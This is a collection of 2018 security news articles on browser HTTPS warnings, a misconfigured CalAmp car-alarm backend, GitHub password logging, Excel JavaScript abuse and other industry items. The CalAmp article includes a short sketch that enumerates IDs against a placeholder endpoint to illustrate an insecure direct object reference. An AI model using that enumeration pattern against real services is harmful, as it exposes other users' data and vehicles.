- Security -





Chrome evolves security indicators, marking HTTP content with a red warning
20.5.2018 securityaffairs Security

Starting with Chrome 70, Google will mark HTTP content with a red warning as Big G continues its effort to make the web more secure.
Since January 2017, Chrome has indicated connection security with an icon in the address bar, labeling HTTP connections to sites as non-secure; since May 2017, Google has also been marking newly registered sites that serve login pages or password input fields over HTTP as not secure.

Returning to the present: as of May 2018, the overall share of encrypted traffic across several Google products is more than 93%.

“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.

This is an important success for Google, considering that in early 2014 only 50% of its traffic was encrypted.

According to the Google Transparency report, around 75% of the pages loaded via Chrome in early May 2018 were served over secure HTTPS connections, while in 2014 the percentage was only around 40%.

Google now plans to mark unencrypted connections with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.

Chrome 70 treatment for HTTP pages with user input

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started,” explained Emily Schechter, Product Manager, Chrome Security.


Chrome to Issue Red "Not Secure" Warning for HTTP
19.5.2018 securityweek  Security

Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.

The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.

Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.

Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.

At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.

Similar advancements were observed across the web as well, where around three quarters of the pages loaded via Chrome at the end of last week were served over HTTPS. Three years ago, only around 40% of the loaded pages were using HTTPS.

Given the wider adoption of HTTPS, Google is now ready to make another push towards eliminating unencrypted connections by marking HTTP pages with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.

This, however, is just one of the major changes Google is making to Chrome’s security indicators: Chrome 69 will remove the green “Secure” wording and the HTTPS scheme indicator in September 2018.

“Users should expect that the web is safe by default, and they’ll be warned when there’s an issue. Since we’ll soon start marking all HTTP pages as ‘not secure’, we’ll step towards removing Chrome’s positive security indicators so that the default unmarked state is secure,” Schechter notes.

Google isn’t the only Internet company to be pushing for the adoption of HTTPS: WordPress started offering free HTTPS to all hosted websites, Let’s Encrypt provides free HTTPS certificates, and Amazon is offering free security certificates to AWS customers.

Since last year, Firefox too has been warning users when webpages serve login fields over an insecure HTTP connection.

As of May 1, Chrome is also displaying a warning when encountering a publicly-trusted certificate (DV, OV, and EV) issued after April 30 that is not compliant with the Chromium Certificate Transparency (CT) Policy.

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities -- so don’t wait to migrate to HTTPS,” Schechter concludes.


Misconfigured CalAmp Server Enabled Vehicle Takeover
19.5.2018 securityweek  Security

A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.

The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.

The researchers discovered that the application uses an SSL connection with SSL pinning to prevent tampering.

However, the application also connected to the Calamp.com Lender Outlook service, where login was possible using the credentials from the Viper app.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them,” Stykas notes.

While everything on that domain was correctly secured, the researchers discovered that the reports were delivered by another server running TIBCO JasperReports software. After removing all parameters there, the researchers found they were logged in as a user with limited rights but with access to a variety of reports.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input. And…well...we could provide any number we wanted,” the researcher explains.
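In other words, the report endpoint trusted whatever ID the client supplied, a classic insecure direct object reference. A hypothetical sketch of the pattern follows; the endpoint, parameter name, and IDs are invented for illustration, not CalAmp's actual API:

```typescript
// Hypothetical sketch of the IDOR pattern described above; the endpoint,
// parameter name, and ID range are invented, not CalAmp's actual API.
for (let vehicleId = 1000; vehicleId <= 1005; vehicleId++) {
  const res = await fetch(
    `https://reports.example.com/run?vehicleId=${vehicleId}`
  );
  // With no authorization check on the server, every 200 response
  // returns a report belonging to some other user's vehicle.
  console.log(vehicleId, res.status);
}
```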

The server not only provided access to all the reports for all the vehicles, including location history, but also included data sources with usernames (although the passwords were masked). Furthermore, the server allowed for the copying and editing of existing reports, meaning that an attacker could add arbitrary XSS to steal information.

With all production databases present on the server, including CalAmp connect device outlook, the researchers then discovered that it was possible to take over a user account via the mobile application, as long as an older password for the account was known. From the application, it is then possible to manipulate the connected device, in this case a vehicle.

Basically, an attacker who knows an old password for an account can change the current password to the old one, then simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

The vulnerability also allows an attacker to retrieve a list of all users and location reports on users, or start a vehicle’s engine whenever they want. They could also “get all the IoT devices from connect database or reset a password there and start poking around,” the researcher notes.

The researchers reported the issue to CalAmp at the beginning of May 2018, and the company resolved the bug within 10 days of receiving the report. CalAmp also updated its website to make it easier for security researchers to report any other vulnerabilities they discover in the company’s products.


F-Secure Unveils New Endpoint Detection & Response Solution
19.5.2018 securityweek  Security

Finland-based cybersecurity firm F-Secure on Thursday announced the launch of a new endpoint detection and response (EDR) solution that combines human expertise and artificial intelligence.

The new offering, F-Secure Rapid Detection & Response, is designed to help organizations protect their IT systems against targeted attacks.

The solution leverages lightweight endpoint sensors and AI-powered data analysis capabilities to monitor devices for malicious activity. Rapid Detection & Response creates a baseline for normal behavior and flags any unusual activity. Suspicious behavior is subjected to additional analysis to prevent false positives that could overwhelm security teams, F-Secure said.

The product can be configured to respond to potential threats in various ways. It can provide guidance to the organization’s IT team or managed service provider on how to respond to an incident, or it can take action automatically in order to contain an attack. More difficult cases can be escalated to a local partner that is trained and supported by F-Secure experts.

Each potential threat is analyzed using a process that F-Secure has named Broad Context Detection, which leverages both human expertise and AI to help organizations validate threats and assess their impact.

F-Secure EDR

“One trick that’s common in modern attacks is to disguise malicious activity as something normal, and attackers are always finding new ways to do this. And since there’s countless numbers of normal things happening in any given environment, it’s basically impossible for companies to rely on human experts or artificial intelligence alone to comb through all that data,” explained F-Secure Chief Technology Officer Mika Stahlberg.

“Artificial intelligence trained by the best cyber security experts is vital when you’re looking for needles in a digital haystack, and in the right hands, it’s able to keep defenders a step ahead of even the most skilled, highly motivated attackers,” Stahlberg added.

F-Secure Rapid Detection & Response is available through the security firm’s network of authorized partners. The solution can be managed directly by an organization’s IT department or it can be used as a managed service from one of F-Secure’s partners.


Behind the Scenes in the Deceptive App Wars
16.5.2018 securityweek  Security

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described as potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront about how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director of program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – the CSA itself. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative, and it raises some interesting points. The ‘groundswell of complaints’ is to be expected, particularly from the apps and app developers called out for being deceptive.

However, concern over some other elements seems valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which a user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I’m unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org; which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to be anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA,” Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Some Firefox Screenshots End Up Publicly Accessible
16.5.2018 securityweek  Security

Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.

Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.

This allows users to save a screenshot of the entire page, of the visible section of the page, or use a selection tool to save only a region they consider important. Next, they can dismiss the action, copy the screenshot, download it, or click a “Save” button that sends the screenshot to the cloud.

All saved screenshots go to https://screenshots.firefox.com, a default setting in the browser. Furthermore, all screenshots that have been previously shared to public forums are indexed by search engines such as Google and could be discovered and accessed by anyone.

Screenshots are sent to the public server only when the user clicks the “Save” button. Many users, however, might have been long doing so without realizing that they were actually sending them to the cloud.

Firefox screenshots can end up publicly exposed

Mozilla issued a fix for the issue yesterday, soon after details emerged on Twitter. Apparently, this is not the first time the organization has attempted to address the problem, but the previous implementation was flawed.

Specifically, in its attempt to prevent shot pages from being indexed by search engines, Mozilla replaced robots.txt with a <meta name="robots" content="noindex"> tag, but the fix was “only put in place for expired pages instead of all pages as intended.”

“So this is being deployed and now we're talking to DDG/Google etc to strip the domains,” John Gruen, UX-focused Product Manager at Mozilla, told the ethical hacker who discovered the flaw.

Updated: A previous version of this article incorrectly stated that all screenshots end up being publicly accessible.


Microsoft Adds Support for JavaScript in Excel—What Could Possibly Go Wrong?
11.5.2018 thehackernews Security

Shortly after Microsoft announced support for custom JavaScript functions in Excel, someone demonstrated what could possibly go wrong if this feature is abused for malicious purposes.
As promised last year at Microsoft's Ignite 2017 conference, the company has now brought custom JavaScript functions to Excel to extend its capabilities for better work with data.
Custom functions written in JavaScript for Excel spreadsheets currently run on various platforms, including Windows, macOS, and Excel Online, allowing developers to create their own powerful formulae.
But we saw it coming:

Security researcher Charles Dardaman leveraged this feature to show how easy it is to embed the infamous in-browser cryptocurrency mining script from CoinHive inside an MS Excel spreadsheet and run it in the background when opened.
"In order to run Coinhive in Excel, I followed Microsoft’s official documentation and just added my own function," Dardaman said.
Microsoft provides official documentation explaining how to run custom JavaScript functions in Excel.
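For context, a benign custom function in the documented model looks roughly like the sketch below; the CustomFunctions global is provided by the Office add-in runtime, and the function name is illustrative. Dardaman's abuse amounted to putting remote script loading (the CoinHive miner) inside such a function's execution path instead.

```typescript
// Minimal sketch of an Excel custom function, following Microsoft's
// documented custom-functions model; names here are illustrative.
// The CustomFunctions global is provided by the Office add-in runtime;
// this declaration only stands in for it so the sketch is self-contained.
declare const CustomFunctions: {
  associate(name: string, fn: (...args: number[]) => number): void;
};

/**
 * Adds two numbers; Excel exposes it as a worksheet formula.
 * @customfunction
 */
function add(first: number, second: number): number {
  return first + second;
}

// Register the implementation under the name used in the worksheet.
CustomFunctions.associate("ADD", add);
```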
But... JavaScript for Excel Poses Less Threat—Here's Why

However, it should be noted that Excel add-ins, the mechanism responsible for running the custom JavaScript functions, don’t execute by default immediately after opening a JS-embedded spreadsheet.
Instead, users need to manually load and run JavaScript functions through the Excel add-ins feature the first time; after that, the functions are executed automatically every time the Excel file is opened on the same system.
Moreover, when a JavaScript function in an Excel sheet tries to connect to an external server, Microsoft prompts the user to allow or deny the connection, preventing unauthorized code from executing.
Therefore, JavaScript for Excel does not pose much of a threat today, unless and until someone finds a way to execute it automatically without any user interaction.
Besides this, Microsoft has also confirmed that Excel add-ins currently rely on a hidden browser process to run asynchronous custom functions, but in the future, it will run JavaScript directly on some platforms to save memory.
For now, JavaScript custom functions for Excel have been made available in Developer Preview for Windows, Mac, iPad, and Excel Online, and only to Office 365 subscribers enrolled in the Office Insider program.
Microsoft will soon roll this feature out to a broader audience.


Firefox 60 Brings Support for Enterprise Deployments
10.5.2018 securityweek Security

Released on Wednesday, Firefox 60 allows IT administrators to customize the browser for employees, and is also the first browser to feature support for the Web Authentication (WebAuthn) standard.

The new application release also comes with various security patches, on-by-default support for the latest draft TLS 1.3, redesigned Cookies and Site Storage section in Preferences, and other enhancements.

To configure Firefox Quantum for their organization, IT professionals can either use Group Policy on Windows, or a JSON file that works across Mac, Linux, and Windows operating systems, Mozilla says. What’s more, enterprise deployments are supported for both the standard Rapid Release (RR) of Firefox and the Extended Support Release (ESR), which is now version 60.

While the standard Rapid Release automatically receives performance improvements and new features on a six-week basis, the Extended Support Release usually receives the features in a single update per year. Critical security updates are delivered to both releases as soon as possible.

Mozilla has published the necessary information for IT professionals to get started with using Firefox Quantum in their organization on this site.
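For illustration, a minimal policies.json might look like the sketch below. The file is placed in a distribution folder alongside the Firefox binary; the policy names shown are drawn from Mozilla's policy templates, and the homepage URL is a placeholder, so consult Mozilla's documentation for the full supported set.

```json
{
  "policies": {
    "DisableAppUpdate": true,
    "BlockAboutConfig": true,
    "Homepage": {
      "URL": "https://intranet.example.com",
      "Locked": true
    }
  }
}
```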

The WebAuthn standard allows end users to use a single device to log into their accounts without typing a password. The feature is available only on websites that have adopted the standard and can also be used as a secondary authentication after entering a password.

“Essentially, WebAuthn is a set of anti-phishing rules that uses a sophisticated level of authenticators and cryptography to protect user accounts. It supports various authenticators, such as physical security keys today, and in the future mobile phones, or biometric mechanisms such as face recognition or fingerprints,” Mozilla explains.
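For a sense of what adoption looks like on a website, here is a minimal sketch of a WebAuthn registration call in the browser. In a real deployment the challenge and user fields come from the relying party's server; the values shown are placeholders.

```typescript
// Minimal WebAuthn registration sketch (browser context).
// In practice the challenge comes from the server; values are illustrative.
const publicKey: PublicKeyCredentialCreationOptions = {
  challenge: crypto.getRandomValues(new Uint8Array(32)),
  rp: { name: "example.com" },
  user: {
    id: new TextEncoder().encode("user-123"),
    name: "user@example.com",
    displayName: "Example User",
  },
  pubKeyCredParams: [{ type: "public-key", alg: -7 }], // -7 = ES256
};

// Prompts the authenticator (e.g., a USB security key) to mint a credential;
// the attestation response is then sent to the server for verification.
const credential = await navigator.credentials.create({ publicKey });
console.log(credential?.id);
```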

One of the first major web services to have adopted the standard is Dropbox, which announced on Wednesday that WebAuthn is now supported as a two-step verification.

Firefox 60 also brings along patches for over two dozen security vulnerabilities, including two memory safety bugs rated Critical severity.

The latest version of the browser patches 6 High severity flaws, namely use-after-free with SVG animations and clip paths, use-after-free with SVG animations and text paths, same-origin bypass of PDF Viewer to view protected PDF files, insufficient sanitation of PostScript calculator functions in PDF viewer, integer overflow and out-of-bounds write in Skia, and uninitialized memory use by WebRTC encoder.

A total of 14 Medium severity flaws were addressed in the new release (including one that only affects Windows 10 users running the April 2018 update or later), alongside 4 Low risk issues.


Amazon Introduces AWS Security Specialty Certification Exam
4.5.2018 securityweek  Security

Security professionals looking to demonstrate and validate their knowledge of how to secure the Amazon Web Services (AWS) platform can now do so by taking the new AWS Certified Security – Specialty exam.

Intended for individuals who hold either an Associate or Cloud Practitioner certification, the security exam covers a broad range of areas, including incident response, logging and monitoring, infrastructure security, identity and access management, and data protection.

Individuals interested in taking the exam should have at least five years of IT security experience designing and implementing security solutions, Amazon says. At least two years of hands-on experience securing AWS workloads is also recommended.

By taking the exam, candidates validate their ability to demonstrate and understand specialized data classifications and AWS data protection mechanisms, as well as data encryption methods and secure Internet protocols, along with AWS mechanisms to implement them.

The exam also allows candidates to demonstrate working knowledge of AWS security services and features of services to provide a secure production environment, and competency gained from two or more years of production deployment experience using AWS security services and features.

The candidates would also show an ability to make tradeoff decisions with regard to cost, security, and deployment complexity given a set of application requirements, and would demonstrate an understanding of security operations and risk.

In addition to announcing the AWS Certified Security – Specialty exam, Amazon also published training and other resources that would help candidates prepare for the exam (focused on AWS fundamentals, architecture, security operations, and security services).

There are also a couple of AWS whitepapers candidates are encouraged to glance over (Security and Compliance documentation and Compliance resources), as well as exam preparation resource guides they can take advantage of.

The Specialty exam includes 65 questions, should take around 170 minutes to complete, and is offered in English. Candidates are required to pay a $300 fee to participate.


Industry CMO on the Downstream Risks of "Logo Disclosures"
4.5.2018 securityweek  Security

Cybersecurity Marketing Teams Would Benefit From an Ethics Desk

Jennifer Leggio, chief marketing officer at Flashpoint, is an executive with more than a decade's experience in managing corporate cyber security marketing at the highest levels -- much of the time seeking and advocating a greater ethical stance in marketing. At last month's Hack in the Box Conference in Amsterdam, she delivered a keynote presentation entitled, 'A Risk Assessment of Logo Disclosures'.

The basic premise is that failures in the coordinated approach to vulnerability disclosures can seem attractive from an initial marketing perspective, but are damaging to both the industry and its users. The ultimate problem comes from the different missions between security product development and sales teams: the first is purposed to reduce harm, while the latter is purposed to sell product.

In between these teams sit the researchers, whose function is to find weaknesses in security products so that they can be strengthened, and their users better protected. Researchers wish to have their expertise acknowledged, while developers wish to fix their products securely. Between them they have evolved the process known as coordinated disclosure: researchers report their findings to the developer who fixes the faults, and both coordinate simultaneous disclosure of the vulnerability and its fix.

Logos for Vulnerabilities

It's a process -- when it works -- that ensures the developer fixes the product as rapidly as possible while the vulnerability does not become a zero-day exploit for use by cybercriminals, with a CERT acting as 'referee'. The problem comes from undue pressure from marketers, possibly supported by the firm's business leaders. This is the subject of Leggio's keynote presentation: the violation of disclosure process to try to diminish competitors, sell more product, or unethically highlight research prowess.

It's a complex issue because it cuts both ways. Research firms, probably at the behest of marketing, can disclose vulnerabilities ahead of coordination to maximize the publicity of their discovery (and therefore, their visible expertise). Similarly, developers can usurp the agreed coordination date to get fixes out before there is any indication that there was a vulnerability, thereby minimizing any perceived product weakness and negative criticism.

Both have possibly happened in recent months. On March 13, CTS Labs, a virtually unknown Israeli firm, announced the existence of 13 flaws in AMD chips after giving AMD just 24 hours to fix them. "It very much felt like a marketing stunt," Leggio told SecurityWeek.

Two days later, Trail of Bits blogged that they had earlier been retained by CTS to confirm the existence of the AMD flaws -- which they did -- but commented, "Our recommendation to CTS was to disclose the vulnerabilities through a CERT." CTS did not follow this advice. This allowed the controversial company Viceroy Research to publish a statement on the same day as CTS disclosed the vulnerabilities:

"These findings demonstrate that AMD’s key products, and it basis for profitability and growth, the EPYC and Ryzen processors, contain severe and pervasive security flaws that put users and organizations at an unacceptable and damaging risk."

This statement bears all the hallmarks of an attempt to short AMD stock. In January, Moneyweb had described Viceroy Research as a "three-man firm... headed by a previous social worker and two Australian youngsters." It concluded, "there are doubts as to whether Viceroy conducts its own research or if it is merely a front for other investors that seek to avoid the limelight but profit from it."

It is possible, then, that unknown investors immediately attempted to profit from the uncoordinated disclosure -- a perfect example of the downstream risks highlighted by Leggio.

But it's not just the researchers that sometimes break the process. Also in March 2018, Core Security released details of a vulnerability in router manufacturer MikroTik's RouterOS. Core and MikroTik agreed on coordinated disclosure, but just before the agreed date, MikroTik quietly fixed the flaw in an OS update. Whether by design or accident, this allowed the manufacturer to avoid making any disclosure or public recognition of the pre-existing vulnerability.

The risk here is to the end user. Without ever hearing about potential problems, the user can easily assume that there are no problems. It's a false sense of security that is patently dangerous since compromised MikroTik routers are an important part of IoT botnets. According to one firm, compromised MikroTik routers comprised 80% of a botnet (probably Reaper) that was used in a DDoS attack against Dutch financials in January 2018.

It is such downstream risks of upfront marketing-led breaches of the coordinated disclosure process that Leggio discussed in her keynote presentation. Key to her proposal is the introduction of an ethics or 'standards desk' overseeing marketing decisions just as some newspapers have a standards desk overseeing the more contentious news stories.

Marketing teams pushing for external disclosure, she told SecurityWeek, "should have it go through an ethical evaluation to ensure that it's not compromising any bigger picture -- like an LEA investigation -- and/or is not tipping-off a cybercriminal that there might be an exploit in their malware that could help law enforcement. You're basically using coordinated disclosure to help cyber criminals harden their own stuff -- needs to be some review there."

It requires, she added, "a shift in culture and a shift in mindset, making sure that business leaders understand that their sales teams, their marketing teams, their finance teams, their legal teams and so on, are all responsible for making sure that there is an ethical delivery in the message."



GitHub urged some users to reset their passwords after accidentally recording them
3.5.2018 securityaffairs Security

GitHub, the world’s leading software development platform, urged some users to reset their passwords after a problem caused internal logs to record passwords in plain text.

Some users published on Twitter the communication they received via email from the company; the incident was discovered during a regular internal audit.


The company immediately clarified that its systems were not hacked and that users’ data are not at risk.

According to GitHub, only a “small number” of users are affected; the company forced a password reset on their accounts and confirmed it has fixed the problem.

The mail provided details on the problem and explained that user passwords were stored in a secure way.

“GitHub stores user passwords with secure cryptographic hashes (bcrypt). However, this recently introduced bug resulted in our secure internal logs recording plaintext user passwords when users initiated a password reset,” GitHub said.

The company added that the plaintext passwords were only accessible through internal log files accessible to a small portion of its IT staff, they were not publicly available.
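The distinction matters: bcrypt protects the stored credential, not a raw value that application code writes to a log. Below is a minimal sketch of the bug class, using the bcryptjs package for illustration; this is not GitHub's actual code.

```typescript
import bcrypt from "bcryptjs"; // illustrative dependency, not GitHub's stack

const password = "correct horse battery staple";

// What gets stored: a salted, one-way bcrypt hash.
const hash = bcrypt.hashSync(password, 10);
console.log(hash); // e.g. "$2a$10$..."

// The bug class: a log statement in the reset flow that captures
// the raw input, re-exposing exactly what hashing was protecting.
console.log(`password reset requested, input=${password}`);
```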


Back in June 2016, the company adopted a similar measure, forcing a password reset for its customers after it became aware of unauthorized attempts to access a large number of its accounts.

GitHub accounts could represent a mine of information for attackers: in March 2017, threat actors targeted developers who had repositories, using data-stealing malware called Dimnie. The malicious code includes keylogging features and modules that capture screenshots; the attackers were searching for something of interest among the huge number of projects hosted on the platform.


GitHub Exposed Passwords of Some Users

2.5.2018 securityweek Security

GitHub has instructed some users to reset their passwords after a bug caused internal logs to record passwords in plain text.

Several users posted screenshots on Twitter of the security-related email they received from GitHub on Tuesday. The company told impacted customers that the incident was discovered during a regular audit.

GitHub claims only a “small number” of users are affected and the issue has been resolved, but impacted individuals will only regain access to their accounts after they reset their password.

“GitHub stores user passwords with secure cryptographic hashes (bcrypt). However, this recently introduced bug resulted in our secure internal logs recording plaintext user passwords when users initiated a password reset,” GitHub said.

The company has assured users that the plaintext passwords were never accessible to the public, to other GitHub users, or to the majority of GitHub staff. While some staff members could have accessed the logs containing the plaintext passwords, GitHub believes it’s “very unlikely” to have happened.

GitHub has highlighted that its systems have not been hacked or compromised in any way.

This is not the first time the Git repository hosting service has asked users to reset their passwords. Back in mid-2016, the company locked some users out of their accounts after malicious actors had started abusing credentials leaked from other online services to log in to GitHub accounts.

The company announced recently that it paid out a total of $166,495 to security researchers who reported vulnerabilities through its bug bounty program last year.


Amazon Boosts Domain Protections in CloudFront
1.5.2018 securityweek Security

Amazon Web Services (AWS) has unveiled a series of enhancements for the domain protections available in CloudFront, meant to ensure that all requests handled by the service come from legitimate domain owners.

Integrated with AWS, the CloudFront global content delivery network service provides both network and application level protection, scales globally, negotiates TLS connections with high security ciphers, and includes distributed denial of service protections.

As per the AWS Terms of Service, CloudFront customers aren’t allowed to receive traffic for a domain they are not authorized to use, and Amazon disables abusive accounts when it becomes aware of this type of activity. Now, the company is also integrating checks directly into the CloudFront API and Content Distribution service to prevent abusive behavior.

One of the newly announced enhancements affects protections against “dangling” DNS entries, where a customer deletes their CloudFront distribution but leaves the DNS still pointing at the service. Such situations are very rare, but some customers do leave their old domains dormant, the company says.

In some of these situations, an abuser could exploit a subdomain. If the customer no longer uses the subdomain (although the domain itself is in use) and it points to a deleted CloudFront distribution, an abuser could register the subdomain and claim traffic that they aren’t entitled to.

“This also means that cookies may be set and intercepted for HTTP traffic potentially including the parent domain. HTTPS traffic remains protected if you’ve removed the certificate associated with the original CloudFront distribution,” Amazon explains.

The best fix is to ensure there are no dangling DNS entries in the first place, and Amazon is already reminding users moving to an alternate domain to delete any DNS entries that may still be pointing at CloudFront. Furthermore, checks in the CloudFront API ensure this kind of domain claiming can’t occur when using wildcard domains.
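A simple way to audit for the problem is sketched below: resolve each retired subdomain's CNAME and flag anything still aimed at CloudFront. This assumes Node 18+, and the domain is illustrative.

```typescript
// Sketch: flag DNS entries still pointing at CloudFront after a
// distribution has been removed. Domain name is illustrative.
import { resolveCname } from "node:dns/promises";

const records = await resolveCname("old-subdomain.example.com");
if (records.some((r) => r.endsWith(".cloudfront.net"))) {
  console.log("Dangling entry: still aimed at CloudFront; delete it if unused.");
}
```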

Courtesy of the new enhanced domain protection, CloudFront now also checks the DNS whenever the customer removes an alternate domain. Thus, if the service determines that the domain is still pointing at a CloudFront distribution, the API call fails and other accounts can’t claim the traffic.

Amazon is also planning improved protections against domain fronting, a technique where “a non-standard client makes a TLS/SSL connection to a certain name, but then makes a HTTPS request for an unrelated name.” It basically means routing application traffic to mask its destination.

